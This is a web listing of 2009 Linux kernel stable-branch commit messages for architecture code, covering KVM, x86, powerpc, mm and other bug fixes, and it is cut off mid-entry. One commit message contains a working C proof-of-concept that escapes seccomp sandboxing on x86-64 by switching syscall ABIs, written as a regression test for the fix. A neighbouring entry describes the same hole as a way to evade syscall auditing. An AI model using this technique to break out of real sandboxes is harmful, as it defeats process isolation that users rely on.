summaryrefslogtreecommitdiff
path: root/arch
AgeCommit message (Collapse)Author
2009-05-02powerpc: Sanitize stack pointer in signal handling codeJosh Boyer
This has been backported to 2.6.28.x from commit efbda86098 in Linus' tree On powerpc64 machines running 32-bit userspace, we can get garbage bits in the stack pointer passed into the kernel. Most places handle this correctly, but the signal handling code uses the passed value directly for allocating signal stack frames. This fixes the issue by introducing a get_clean_sp function that returns a sanitized stack pointer. For 32-bit tasks on a 64-bit kernel, the stack pointer is masked correctly. In all other cases, the stack pointer is simply returned. Additionally, we pass an 'is_32' parameter to get_sigframe now in order to get the properly sanitized stack. The callers are know to be 32 or 64-bit statically. Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: VMX: Flush volatile msrs before emulating rdmsrAvi Kivity
(cherry picked from 516a1a7e9dc80358030fe01aabb3bedf882db9e2) Some msrs (notable MSR_KERNEL_GS_BASE) are held in the processor registers and need to be flushed to the vcpu struture before they can be read. This fixes cygwin longjmp() failure on Windows x64. Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: x86: fix LAPIC pending count calculationMarcelo Tosatti
(cherry picked from b682b814e3cc340f905c14dff87ce8bdba7c5eba) Simplify LAPIC TMCCT calculation by using hrtimer provided function to query remaining time until expiration. Fixes host hang with nested ESX. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Alexander Graf <agraf@suse.de> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: x86: disable kvmclock on non constant TSC hostsMarcelo Tosatti
(cherry picked from abe6655dd699069b53bcccbc65b2717f60203b12) This is better. Currently, this code path is posing us big troubles, and we won't have a decent patch in time. So, temporarily disable it. Signed-off-by: Glauber Costa <glommer@redhat.com> Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: PIT: fix i8254 pending count readMarcelo Tosatti
(cherry picked from d2a8284e8fca9e2a938bee6cd074064d23864886) count_load_time assignment is bogus: its supposed to contain what it means, not the expiration time. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: MMU: handle large host sptes on invlpg/resyncMarcelo Tosatti
(cherry picked from 87917239204d67a316cb89751750f86c9ed3640b) The invlpg and sync walkers lack knowledge of large host sptes, descending to non-existant pagetable level. Stop at directory level in such case. Fixes SMP Windows XP with hugepages. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: MMU: check for present pdptr shadow page in walk_shadowMarcelo Tosatti
(cherry picked from eb64f1e8cd5c3cae912db30a77d062367f7a11a6) walk_shadow assumes the caller verified validity of the pdptr pointer in question, which is not the case for the invlpg handler. Fixes oops during Solaris 10 install. Signed-off-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: x86 emulator: Fix handling of VMMCALL instructionAmit Shah
(cherry picked from fbce554e940a983d005e29849636d0ef54b3eb18) The VMMCALL instruction doesn't get recognised and isn't processed by the emulator. This is seen on an Intel host that tries to execute the VMMCALL instruction after a guest live migrates from an AMD host. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: Fix cpuid iteration on multiple leaves per eacNitin A Kamble
(cherry picked from 0fdf8e59faa5c60e9d77c8e14abe3a0f8bfcf586) The code to traverse the cpuid data array list for counting type of leaves is currently broken. This patches fixes the 2 things in it. 1. Set the 1st counting entry's flag KVM_CPUID_FLAG_STATE_READ_NEXT. Without it the code will never find a valid entry. 2. Also the stop condition in the for loop while looking for the next unflaged entry is broken. It needs to stop when it find one matching entry; and in the case of count of 1, it will be the same entry found in this iteration. Signed-Off-By: Nitin A Kamble <nitin.a.kamble@intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: Fix cpuid leaf 0xb loop terminationNitin A Kamble
(cherry picked from 0853d2c1d849ef69884d2447d90d04007590b72b) For cpuid leaf 0xb the bits 8-15 in ECX register define the end of counting leaf. The previous code was using bits 0-7 for this purpose, which is a bug. Signed-off-by: Nitin A Kamble <nitin.a.kamble@intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: MMU: Fix aliased gfns treated as unaliasedIzik Eidus
(cherry picked from 2843099fee32a6020e1caa95c6026f28b5d43bff) Some areas of kvm x86 mmu are using gfn offset inside a slot without unaliasing the gfn first. This patch makes sure that the gfn will be unaliased and add gfn_to_memslot_unaliased() to save the calculating of the gfn unaliasing in case we have it unaliased already. Signed-off-by: Izik Eidus <ieidus@redhat.com> Acked-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: SVM: Set the 'busy' flag of the TR selectorAmit Shah
(cherry picked from c0d09828c870f90c6bc72070ada281568f89c63b) The busy flag of the TR selector is not set by the hardware. This breaks migration from amd hosts to intel hosts. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: SVM: Set the 'g' bit of the cs selector for cross-vendor migrationAmit Shah
(cherry picked from 25022acc3dd5f0b54071c7ba7c371860f2971b52) The hardware does not set the 'g' bit of the cs selector and this breaks migration from amd hosts to intel hosts. Set this bit if the segment limit is beyond 1 MB. Signed-off-by: Amit Shah <amit.shah@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: VMX: Move private memory slot positionSheng Yang
(cherry picked from 6fe639792c7b8e462baeaac39ecc33541fd5da6e) PCI device assignment would map guest MMIO spaces as separate slot, so it is possible that the device has more than 2 MMIO spaces and overwrite current private memslot. The patch move private memory slot to the top of userspace visible memory slots. Signed-off-by: Sheng Yang <sheng@linux.intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: MMU: Extend kvm_mmu_page->slot_bitmap sizeSheng Yang
(cherry picked from 291f26bc0f89518ad7ee3207c09eb8a743ac8fcc) Otherwise set_bit() for private memory slot(above KVM_MEMORY_SLOTS) would corrupted memory in 32bit host. Signed-off-by: Sheng Yang <sheng@linux.intel.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: call kvm_arch_vcpu_reset() instead of the kvm_x86_ops callbackGleb Natapov
(cherry picked from 5f179287fa02723215eecf681d812b303c243973) Call kvm_arch_vcpu_reset() instead of directly using arch callback. The function does additional things. Signed-off-by: Gleb Natapov <gleb@redhat.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02KVM: x86: Reset pending/inject NMI state on CPU resetJan Kiszka
(cherry picked from 448fa4a9c5dbc6941dd19ed09692c588d815bb06) CPU reset invalidates pending or already injected NMIs, therefore reset the related state variables. Based on original patch by Gleb Natapov. Signed-off-by: Gleb Natapov <gleb@redhat.com> Signed-off-by: Jan Kiszka <jan.kiszka@siemens.com> Signed-off-by: Avi Kivity <avi@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02powerpc: Fix data-corrupting bug in __futex_atomic_opPaul Mackerras
upstream commit: 306a82881b14d950d59e0b59a55093a07d82aa9a Richard Henderson pointed out that the powerpc __futex_atomic_op has a bug: it will write the wrong value if the stwcx. fails and it has to retry the lwarx/stwcx. loop, since 'oparg' will have been overwritten by the result from the first time around the loop. This happens because it uses the same register for 'oparg' (an input) as it uses for the result. This fixes it by using separate registers for 'oparg' and 'ret'. Cc: stable@kernel.org Signed-off-by: Paul Mackerras <paulus@samba.org> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02x86, setup: mark %esi as clobbered in E820 BIOS callMichael K. Johnson
upstream commit: 01522df346f846906eaf6ca57148641476209909 Jordan Hargrave diagnosed a BIOS clobbering %esi in the E820 call. That particular BIOS has been fixed, but there is a possibility that this is responsible for other occasional reports of early boot failure, and it does not hurt to add %esi to the clobbers. -stable candidate patch. Cc: Justin Forbes <jmforbes@linuxtx.org> Signed-off-by: Michael K Johnson <johnsonm@rpath.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02x86: mtrr: don't modify RdDram/WrDram bits of fixed MTRRsAndreas Herrmann
upstream commit: 3ff42da5048649503e343a32be37b14a6a4e8aaf Impact: bug fix + BIOS workaround BIOS is expected to clear the SYSCFG[MtrrFixDramModEn] on AMD CPUs after fixed MTRRs are configured. Some BIOSes do not clear SYSCFG[MtrrFixDramModEn] on BP (and on APs). This can lead to obfuscation in Linux when this bit is not cleared on BP but cleared on APs. A consequence of this is that the saved fixed-MTRR state (from BP) differs from the fixed-MTRRs of APs -- because RdDram/WrDram bits are read as zero when SYSCFG[MtrrFixDramModEn] is cleared -- and Linux tries to sync fixed-MTRR state from BP to AP. This implies that Linux sets SYSCFG[MtrrFixDramEn] and activates those bits. More important is that (some) systems change these bits in SMM when ACPI is enabled. Hence it is racy if Linux modifies RdMem/WrMem bits, too. (1) The patch modifies an old fix from Bernhard Kaindl to get suspend/resume working on some Acer Laptops. Bernhard's patch tried to sync RdMem/WrMem bits of fixed MTRR registers and that helped on those old Laptops. (Don't ask me why -- can't test it myself). But this old problem was not the motivation for the patch. (See http://lkml.org/lkml/2007/4/3/110) (2) The more important effect is to fix issues on some more current systems. On those systems Linux panics or just freezes, see http://bugzilla.kernel.org/show_bug.cgi?id=11541 (and also duplicates of this bug: http://bugzilla.kernel.org/show_bug.cgi?id=11737 http://bugzilla.kernel.org/show_bug.cgi?id=11714) The affected systems boot only using acpi=ht, acpi=off or when the kernel is built with CONFIG_MTRR=n. The acpi options prevent full enablement of ACPI. Obviously when ACPI is enabled the BIOS/SMM modfies RdMem/WrMem bits. When CONFIG_MTRR=y Linux also accesses and modifies those bits when it needs to sync fixed-MTRRs across cores (Bernhard's fix, see (1)). How do you synchronize that? You can't. As a consequence Linux shouldn't touch those bits at all (Rationale are AMD's BKDGs which recommend to clear the bit that makes RdMem/WrMem accessible). This is the purpose of this patch. And (so far) this suffices to fix (1) and (2). I suggest not to touch RdDram/WrDram bits of fixed-MTRRs and SYSCFG[MtrrFixDramEn] and to clear SYSCFG[MtrrFixDramModEn] as suggested by AMD K8, and AMD family 10h/11h BKDGs. BIOS is expected to do this anyway. This should avoid that Linux and SMM tread on each other's toes ... Signed-off-by: Andreas Herrmann <andreas.herrmann3@amd.com> Cc: trenn@suse.de Cc: Yinghai Lu <yinghai@kernel.org> LKML-Reference: <20090312163937.GH20716@alberich.amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02x86, PAT, PCI: Change vma prot in pci_mmap to reflect inherited protVenkatesh Pallipadi
upstream commit: 9cdec049389ce2c324fd1ec508a71528a27d4a07 While looking at the issue in the thread: http://marc.info/?l=dri-devel&m=123606627824556&w=2 noticed a bug in pci PAT code and memory type setting. PCI mmap code did not set the proper protection in vma, when it inherited protection in reserve_memtype. This bug only affects the case where there exists a WC mapping before X does an mmap with /proc or /sys pci interface. This will cause X userlevel mmap from /proc or /sysfs to fail on fork. Reported-by: Kevin Winchester <kjwinchester@gmail.com> Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Dave Airlie <airlied@redhat.com> LKML-Reference: <20090323190720.GA16831@linux-os.sc.intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Chris Wright <chrisw@sous-sol.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23powerpc: Remove extra semicolon in fsl_soc.cJohns Daniel
TSEC/MDIO will not work with older device trees because of a semicolon at the end of a macro resulting in an empty for loop body. This fix only applies to 2.6.28; this code is gone in 2.6.29, according to Grant Likely! Signed-off-by: Johns Daniel <johns.daniel@gmail.com> Acked-by: Grant Likely <grant.likely@secretlab.ca> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23S390: __div64_31 broken for CONFIG_MARCH_G5Martin Schwidefsky
commit 4fa81ed27781a12f6303b9263056635ae74e3e21 upstream. The implementation of __div64_31 for G5 machines is broken. The comments in __div64_31 are correct, only the code does not do what the comments say. The part "If the remainder has overflown subtract base and increase the quotient" is only partially realized, the base is subtracted correctly but the quotient is only increased if the dividend had the last bit set. Using the correct instruction fixes the problem. Reported-by: Frans Pop <elendil@planet.nl> Tested-by: Frans Pop <elendil@planet.nl> Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23Fix misreporting of #cores as #hyperthreads for Q9550Joe Korty
For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly thinks the #cores present is the #hyperthreads present. i386 mode was not examined but is assumed to have the same problem. A backport of the following three 2.6.29-rc1 patches fixes the problem: 066941bd4eeb159307a5d7d795100d0887c00442: [PATCH] x86: unmask CPUID levels on Intel CPUs 99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef: [PATCH] x86: unmask CPUID levels on Intel CPUs, fix bdf21a49bab28f0d9613e8d8724ef9c9168b61b9: [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h> From the first patch: "If the CPUID limit bit in MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID information available. This is required for some features to work, in particular XSAVE." Originally-Developed-by: H. Peter Anvin <hpa@linux.intel.com> Backported-by: Joe Korty <joe.korty@ccur.com> Signed-off-by: Joe Korty <joe.korty@ccur.com> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23Build fix for __early_pfn_to_nid() undefined link errorTony Luck
commit 334f85b647bc46ff4d27ace55aa65f44d6a2f4db upstream. ia64 only defines __early_pfn_to_nid() for SPARSEMEM && NUMA configurations, so the recent: commit: f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 mm: clean up for early_pfn_to_nid() ends up with some link problems for certain configuration files. Fix arch/ia64/Kconfig to only define HAVE_ARCH_EARLY_PFN_TO_NID in the cases where we do provide this function. Signed-off-by: Tony Luck <tony.luck@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16MIPS: compat: Implement is_compat_task.Ralf Baechle
commit 4302e5d53b9166d45317e3ddf0a7a9dab3efd43b upstream. This is a build fix required after "x86-64: seccomp: fix 32/64 syscall hole" (commit 5b1017404aea6d2e552e991b3fd814d839e9cd67). MIPS doesn't have the issue that was fixed for x86-64 by that patch. This also doesn't solve the N32 issue which is that N32 seccomp processes will be treated as non-compat processes thus only have access to N64 syscalls. Signed-off-by: Ralf Baechle <ralf@linux-mips.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16ARM: Add i2c_board_info for RiscPC PCF8583Russell King
commit 531660ef5604c75de6fdead9da1304051af17c09 upstream Add the necessary i2c_board_info structure to fix the lack of PCF8583 RTC on RiscPC. Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk> Signed-off-by: Jean Delvare <khali@linux-fr.org> Cc: Alessandro Zummo <a.zummo@towertech.it> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86: fix math_emu register frame accessTejun Heo
commit d315760ffa261c15ff92699ac6f514112543d7ca upstream. do_device_not_available() is the handler for #NM and it declares that it takes a unsigned long and calls math_emu(), which takes a long argument and surprisingly expects the stack frame starting at the zero argument would match struct math_emu_info, which isn't true regardless of configuration in the current code. This patch makes do_device_not_available() take struct pt_regs like other exception handlers and initialize struct math_emu_info with pointer to it and pass pointer to the math_emu_info to math_emulate() like normal C functions do. This way, unless gcc makes a copy of struct pt_regs in do_device_not_available(), the register frame is correctly accessed regardless of kernel configuration or compiler used. This doesn't fix all math_emu problems but it at least gets it somewhat working. Signed-off-by: Tejun Heo <tj@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86: math_emu info cleanupTejun Heo
commit ae6af41f5a4841f06eb92bc86ad020ad44ae2a30 upstream. Impact: cleanup * Come on, struct info? s/struct info/struct math_emu_info/ * Use struct pt_regs and kernel_vm86_regs instead of defining its own register frame structure. Signed-off-by: Tejun Heo <tj@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86, hpet: fix for LS21 + HPET = boot hangjohn stultz
commit b13e24644c138d0ddbc451403c30a96b09bfd556 upstream. Between 2.6.23 and 2.6.24-rc1 a change was made that broke IBM LS21 systems that had the HPET enabled in the BIOS, resulting in boot hangs for x86_64. Specifically commit b8ce33590687888ebb900d09557b8807c4539022, which merges the i386 and x86_64 HPET code. Prior to this commit, when we setup the HPET timers in x86_64, we did the following: hpet_writel(HPET_TN_ENABLE | HPET_TN_PERIODIC | HPET_TN_SETVAL | HPET_TN_32BIT, HPET_T0_CFG); However after the i386/x86_64 HPET merge, we do the following: cfg = hpet_readl(HPET_Tn_CFG(timer)); cfg |= HPET_TN_ENABLE | HPET_TN_PERIODIC | HPET_TN_SETVAL | HPET_TN_32BIT; hpet_writel(cfg, HPET_Tn_CFG(timer)); However on LS21s with HPET enabled in the BIOS, the HPET_T0_CFG register boots with Level triggered interrupts (HPET_TN_LEVEL) enabled. This causes the periodic interrupt to be not so periodic, and that results in the boot time hang I reported earlier in the delay calibration. My fix: Always disable HPET_TN_LEVEL when setting up periodic mode. Signed-off-by: John Stultz <johnstul@us.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86/paravirt: make arch_flush_lazy_mmu/cpu disable preemptionJeremy Fitzhardinge
commit d85cf93da66977dbc645352be1b2084a659d8a0b upstream. Impact: avoid access to percpu vars in preempible context They are intended to be used whenever there's the possibility that there's some stale state which is going to be overwritten with a queued update, or to force a state change when we may be in lazy mode. Either way, we could end up calling it with preemption enabled, so wrap the functions in their own little preempt-disable section so they can be safely called in any context (though preemption should never be enabled if we're actually in a lazy state). (Move out of line to avoid #include dependencies.) Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Thomas Gleixner <tglx@linutronix.de> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16powerpc: Fix load/store float double alignment handlerMichael Neuling
commit 49f297f8df9adb797334155470ea9ca68bdb041e upstream. When we introduced VSX, we changed the way FPRs are stored in the thread_struct. Unfortunately we missed the load/store float double alignment handler code when updating how we access FPRs in the thread_struct. Below fixes this and merges the little/big endian case. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16xen: disable interrupts early, as start_kernel expectsJeremy Fitzhardinge
commit 55d8085671863fe4ee6a17b7814bd38180a44e1d upstream. This avoids a lockdep warning from: if (DEBUG_LOCKS_WARN_ON(unlikely(!early_boot_irqs_enabled))) return; in trace_hardirqs_on_caller(); Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Cc: Mark McLoughlin <markmc@redhat.com> Cc: Xen-devel <xen-devel@lists.xensource.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86-64: syscall-audit: fix 32/64 syscall holeRoland McGrath
commit ccbe495caa5e604b04d5a31d7459a6f6a76a756c upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases, audit_syscall_entry() will use the wrong system call number table and the wrong system call argument registers. This could be used to circumvent a syscall audit configuration that filters based on the syscall numbers or argument details. Signed-off-by: Roland McGrath <roland@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86-64: seccomp: fix 32/64 syscall holeRoland McGrath
commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86-64: fix int $0x80 -ENOSYS returnRoland McGrath
commit c09249f8d1b84344eca882547afdbffee8c09d14 upstream. One of my past fixes to this code introduced a different new bug. When using 32-bit "int $0x80" entry for a bogus syscall number, the return value is not correctly set to -ENOSYS. This only happens when neither syscall-audit nor syscall tracing is enabled (i.e., never seen if auditd ever started). Test program: /* gcc -o int80-badsys -m32 -g int80-badsys.c Run on x86-64 kernel. Note to reproduce the bug you need auditd never to have started. */ #include <errno.h> #include <stdio.h> int main (void) { long res; asm ("int $0x80" : "=a" (res) : "0" (99999)); printf ("bad syscall returns %ld\n", res); return res != -ENOSYS; } The fix makes the int $0x80 path match the sysenter and syscall paths. Reported-by: Dmitry V. Levin <ldv@altlinux.org> Signed-off-by: Roland McGrath <roland@redhat.com> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86: tone down mtrr_trim_uncached_memory() warningIngo Molnar
commit bf3647c44bc76c43c4b2ebb4c37a559e899ac70e upstream. kerneloops.org is reporting a lot of these warnings that come due to vmware not setting up any MTRRs for emulated CPUs: | Reported 709 times (14696 total reports) | BIOS bug (often in VMWare) where the MTRR's are set up incorrectly | or not at all | | This warning was last seen in version 2.6.29-rc2-git1, and first | seen in 2.6.24. | | More info: | http://www.kerneloops.org/searchweek.php?search=mtrr_trim_uncached_memory Keep a one-liner KERN_INFO about it - so that we have so notice if empty MTRRs are caused by native hardware/BIOS weirdness. Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86: add Dell XPS710 reboot quirkLeann Ogasawara
commit dd4124a8a06bca89c077a16437edac010f0bb993 upstream. Dell XPS710 will hang on reboot. This is resolved by adding a quirk to set bios reboot. Signed-off-by: Leann Ogasawara <leann.ogasawara@canonical.com> Signed-off-by: Tim Gardner <tim.gardner@canonical.com> Cc: "manoj.iyer" <manoj.iyer@canonical.com> LKML-Reference: <1236196380.3231.89.camel@emiko> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86: oprofile: don't set counter width from cpuid on Core2Tim Blechmann
commit 780eef9492b16a1543a3b2ae9f9526a735fc9856 upstream. Impact: fix stuck NMIs and non-working oprofile on certain CPUs Resetting the counter width of the performance counters on Intel's Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode. This should fix bug #12395: http://bugzilla.kernel.org/show_bug.cgi?id=12395 Signed-off-by: Tim Blechmann <tim@klingt.org> Signed-off-by: Robert Richter <robert.richter@amd.com> LKML-Reference: <20090303100412.GC10085@erda.amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86, vmi: TSC going backwards check in vmi clocksourceAlok N Kataria
commit 48ffc70b675aa7798a52a2e92e20f6cce9140b3d upstream. Impact: fix time warps under vmware Similar to the check for TSC going backwards in the TSC clocksource, we also need this check for VMI clocksource. Signed-off-by: Alok N Kataria <akataria@vmware.com> Cc: Zachary Amsden <zach@vmware.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16mm: fix memmap init for handling memory holeKAMEZAWA Hiroyuki
commit cc2559bccc72767cb446f79b071d96c30c26439b upstream. Now, early_pfn_in_nid(PFN, NID) may returns false if PFN is a hole. and memmap initialization was not done. This was a trouble for sparc boot. To fix this, the PFN should be initialized and marked as PG_reserved. This patch changes early_pfn_in_nid() return true if PFN is a hole. Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Reported-by: David Miller <davem@davemlloft.net> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16mm: clean up for early_pfn_to_nid()KAMEZAWA Hiroyuki
commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream. What's happening is that the assertion in mm/page_alloc.c:move_freepages() is triggering: BUG_ON(page_zone(start_page) != page_zone(end_page)); Once I knew this is what was happening, I added some annotations: if (unlikely(page_zone(start_page) != page_zone(end_page))) { printk(KERN_ERR "move_freepages: Bogus zones: " "start_page[%p] end_page[%p] zone[%p]\n", start_page, end_page, zone); printk(KERN_ERR "move_freepages: " "start_zone[%p] end_zone[%p]\n", page_zone(start_page), page_zone(end_page)); printk(KERN_ERR "move_freepages: " "start_pfn[0x%lx] end_pfn[0x%lx]\n", page_to_pfn(start_page), page_to_pfn(end_page)); printk(KERN_ERR "move_freepages: " "start_nid[%d] end_nid[%d]\n", page_to_nid(start_page), page_to_nid(end_page)); ... And here's what I got: move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00] move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00] move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff] move_freepages: start_nid[1] end_nid[0] My memory layout on this box is: [ 0.000000] Zone PFN ranges: [ 0.000000] Normal 0x00000000 -> 0x0081ff5d [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[8] active PFN ranges [ 0.000000] 0: 0x00000000 -> 0x00020000 [ 0.000000] 1: 0x00800000 -> 0x0081f7ff [ 0.000000] 1: 0x0081f800 -> 0x0081fe50 [ 0.000000] 1: 0x0081fed1 -> 0x0081fed8 [ 0.000000] 1: 0x0081feda -> 0x0081fedb [ 0.000000] 1: 0x0081fedd -> 0x0081fee5 [ 0.000000] 1: 0x0081fee7 -> 0x0081ff51 [ 0.000000] 1: 0x0081ff59 -> 0x0081ff5d So it's a block move in that 0x81f600-->0x81f7ff region 